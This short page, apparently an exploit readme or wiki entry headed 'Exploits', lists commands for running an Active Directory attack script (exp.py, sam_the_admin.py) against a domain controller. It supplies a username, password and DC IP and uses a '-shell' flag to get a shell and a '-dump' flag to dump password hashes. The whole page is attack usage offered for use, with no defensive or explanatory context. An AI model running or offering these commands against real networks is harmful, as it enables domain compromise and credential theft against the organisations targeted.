Exploits

pip3 install -r requirements.txt

# GetShell

python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -shell

# DumpHash

python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -dump

python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip 10.1.1.10 -shell

Last updated